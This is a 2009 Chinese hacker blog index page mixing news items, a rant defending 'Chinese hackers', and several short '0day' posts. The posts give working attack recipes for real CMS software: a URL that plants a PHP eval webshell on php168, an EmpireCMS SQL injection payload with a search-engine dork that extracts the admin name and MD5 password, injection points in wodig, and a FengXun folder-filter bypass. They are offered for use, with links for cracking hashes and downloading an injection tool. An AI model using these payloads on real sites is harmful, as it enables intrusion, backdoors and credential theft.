09 九 09 php1686.0被爆0day可瞬间获得webshell
php168是一套php写的cms程序,在业界是比较出名的而且一直很高调,此次被公布出来的0day不仅影响到php168 6.0而且还牵扯到6.0以下的所有版本.测试语句:在登陆界面网址后面加上?makehtml=1&chdb[htmlname]=ccc.php&chdb[path]=cache&content=?php%20@eval($_POST[ccc]);?即可获得一个文件名ccc.php密码为ccc的php小马.
Tags: 0day
19 七 09 首个黑客网站宏盟获千万融资
红盟
一个国人黑客联盟网站中国红盟近日发布消息将被浙江老板融资1000万元.这也是目前国内黑客网站接收到的最大融资,破纪录的达到了1千万.红盟掌门刘庆在接受采访时说红盟目前每年的营业额是5到6百万,明年预计会突破一千万.红盟的收入来源主要是服务器安全服务,目前国内很多游戏运营商和机房都是他们做的安全,特别是上海地区.另外他们还自己开发了服务器安全软件.
Tags: 黑客
15 七 09 风讯4.0 sp7 0day漏洞
转自:零客 发现者:bloodsword bink
漏洞描述:建立目录的地方,名称过滤上有失误,导致可以绕过过滤建立一个.asp目录
首先注册个账号访问http://www.xxx.com/User/CommPages/FolderImageList.asp?f_UserNumber=06150583700&Type=AddFolder&Path=/userfiles/
06150583700/aaa.asp//&CurrPath=/userfiles/06150583700 (全文…)
Tags: 0day
29 六 09 炒作可以但是请别拿黑客来说事
别拿黑客说事
最近一段时间网上突然冒出一帮推客炒手,他们炒作的目的虽然不同但是目标无一不指向黑客,纷纷扛着洁身自好忧天下人之优的面孔对黑客指指点点一副哗众取宠的嘴脸,仿佛他骂了黑客他的人格就清高了.在他们的精彩文笔下中国的黑客好男儿们无一不被他们描述成一些专门放马盗号,揭人私隐,破坏网络友爱和上网环境等等类型的坏蛋或无法救要网络蛀虫.某些炒手甚至上升到把黑客和中国经济以及未来挂钩了,什么楼市火了要防黑客,股市火了也要防黑客,某软件火了也要防黑客,就连学生考试了还是要防黑客.更有甚者还把迈克尔杰克逊的死讯也和黑客挂上了钩,广州路由器出现问题造成网络堵塞也挂钩了,某超女退出也说是黑客爆了啥私隐.我caoTM的自从上次全国断网事件后,这些炒手们就好像抓住了救命稻草似的拼命的侮辱着黑客,明着一波接一波的带着救世主和先知的面具恶狠狠地用他们那张臭嘴ddos黑客们,暗中却又像哈巴狗一样跟在黑客后面哭爹喊娘的想学点对于他们来说就和茅山道术差不多的黑人神功,梦想着也成为其中的一员.这帮无良的东西就知道写些东西屏蔽网民的眼睛,在国家出现种种危机,当国人被侮辱的时候你们这帮杂种跑哪去了,还不是黑客提咱老百姓出头,一次次中日中美中法黑客大战一次次保家卫国难道都是你们这些无良炒手上的战场吗?事后你们有良知的还知道写个帖子啥的夸夸他们,中立的保持沉默,无良的呢甚至反咬一口说什么招来了更大的攻击波一副tm狗汉奸嘴脸,投降主义路线.今天这篇博文我是写痛快了也骂舒坦了,归根结底一句话请不要用有色的眼睛看待中国黑客,他们不过是一群有理想有技术的孤独群体,他们在大家视线的背后默默的保家卫国维护着国人和祖国的尊严维护着国内互联网的安全与稳定,他们不愿意高调不愿意出来反驳但是我们不能不明真相,不能去诬陷这么一群中国网络守护神,你想想那会多伤他们的心啊.最后也恳请占了99%的有良知的炒手多写写中国黑客的正面示例,强力反击下那些只占1%的无良炒手.我爱中国黑客我为你们自豪.
Tags: 黑客
19 六 09 10个新手学习黑客技术的最佳网站
新手黑客学习网站
这十个网站都配有入侵视频教程和详细的漏洞文章以及黑客软件,全部由浅入深,浅到基本的编程和漏洞利用,深到高级编程和漏洞挖掘.以下我一一列出这十个网站注意排名不分先后黑客动画吧:http://www.hack58.com/ 安全中国:http://www.anqn.com/ 黑鹰安全网:http://www.3800hk.com/ 华夏黑客同盟:http://www.77169.com/ 新世纪网安基地:http://www.520hack.com/ 黑客基地:http://www.hackbase.com/ 红色黑客联盟:http://www.7747.net/ 黑客防线:http://www.hacker.com.cn/ 漏洞数据库:http://www.sebug.net/ 邪恶八进制:http://www.eviloctal.com/ 暗组信息安全论坛:http://www.darkst.com/
Tags: 黑客
14 六 09 帝国cms 0day e/tool/gbook/?bid=1
帝国cms 0day
帝国cms最新0day漏洞利用方法:可以搜索inurl:e/tool/gbook/?bid=1或Powered by EmpireCMS 5.1来找有漏洞的网站,帝国cms留言本漏洞页面e/tool/gbook/?bid=1
然后在姓名处填:縗\ 注意当縗\不给用时可以使用%df\替代
然后在联系邮箱处填,1,1,1,(select concat(username,0×5f,password,0×5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
最后直接提交_前面是管理员名,中间是经过md5加密的密码.md5密码可以到http://www.cmd5.com/或http://www.xmd5.com/查询.帝国cms管理后台地址是e/admin/
Tags: 0day
27 五 09 Pangolin v2.3.0.948注入工具下载
pangolin2.3.0.948注入工具下载
这个不用多解释了吧,比较优秀的黑客注入软件,现在pangolin2.0出中文版了也兼任了utf8注入在不会出现乱码现象了,不过可惜的pangolin免费版功能缩减了不少不再支持mysql数据库等,个人认为还是和pangolin1.3.650结合使用比较好,毕竟1.0版功能上还是比较全面的.pangolin官方下载地址:http://www.nosec.org/zh-hans/pangolin_download.html
23 五 09 落伍者论坛疑遭黑客入侵用户密码泄露
落伍者论坛疑遭黑客入侵大量用户密码被盗
国内最大的站长聚集地落伍者论坛,今天下午突然出现大量用户密码被盗现象,经多方核查发现原来并不是落伍者主站被黑客入侵,而是因去年测试的落伍者分类信息分站被入侵,导致数百用户信息今天被披露到网上,才引发的今日大量用户密码被盗现象.目前落伍的站长拒绝游泳的鱼已经发布广告,被盗用户可以联系QQ:288753恢复密码.积分损失可找小瑜补偿,落伍公告地址:http://www.im286.com/thread-3563529-1-1.html
Tags: 黑客
22 五 09 wodig注入漏洞
wodig注入漏洞
wodig漏洞文件Default.asp?tags_name=a’
article.asp?Src_Child=1&Src_ChildSub=a’
wodig.asp?tags_name=a’这三个注入点在前面加上网址就可以注入了,注意必须是mssql数据库才可以注入管理员表式wo_users 列是username userpass以上信息转载自网络
20 五 09 最美女黑客Yingcracker照片属台湾陈师迪
最美女黑客YingCracker盗用陈师迪照片
走红网络的美女黑客Yingcracker近日被网友曝光其所用照片属于台湾女子陈师迪,陈师迪是台湾省国立大学法律系毕业,她表示保留控诉Yingcracker侵犯肖像权和隐私权的权利.相关美女黑客Yingcracker介绍 (全文…)
Tags: 美女
